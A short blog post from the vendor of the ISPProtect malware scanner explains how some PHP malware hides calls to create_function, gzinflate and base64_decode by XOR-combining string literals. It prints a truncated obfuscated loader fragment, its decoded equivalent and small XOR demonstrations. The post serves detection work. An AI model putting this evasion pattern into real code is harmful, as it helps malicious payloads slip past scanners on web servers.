Today we released version 1.21.1 of our malware scanner ISPProtect. It adds further improvements and new signatures for an even better malware recognition.
With this blog post we want to show you a crypted, let's say creative, type of malware.
<?php [...] $DremCyDVIcUefCvAGjHsXazHSRhDh='O++8>61K7E4X.-T'^',YNYJSn-B+W,GB:'; $wkFbXIabdiDyMjAIjHrrAPR='3>RU5G966'^'TD;;S+XBS'; $XjREnyTkjZLGhlhLUlJh=':.27EG2P0PD4='^'XOARssm4U3+PX'; $RTJYyVDhRUEnHmoSGksRZlPh = $DremCyDVIcUefCvAGjHsXazHSRhDh('',$wkFbXIabdiDyMjAIjHrrAPR($XjREnyTkjZLGhlhLUlJh(
Looks quite suspicious at first sight, of course. But what does this code do? In fact it is the same as:
<?php [...] $var1 = 'create_function'; $var2 = 'gzinflate'; $var3 = 'base64_decode'; $var4 = $var1('', $var2($var3([....]
But how's that? This malware makes use of a "feature" inside of PHP. Byteshifting strings (who the hell would need this in normal code?).
See this example:
echo 51^81;
Result of this is 98.
Now the bad part:
echo '34'^'QU';
Result of this is: ba
In fact it is the same as:
echo chr(ord('3') ^ ord('Q')) . chr(ord('4') ^ ord('U'));
Sadly this makes it quite easy hiding malicious code from "normal" scanners that look for something like "base64_decode", but the ISPProtect heuristic mode is able to find code that is hidden in that way.
Marius Burkard has been working as a software developer for 20 years and has several years of experience as a server administrator. As one of the lead developers of the ISPConfig control panel and technical contact for several hundred web hosting customers, he has extensive experience with malware, hacked websites and the analysis of vulnerabilities.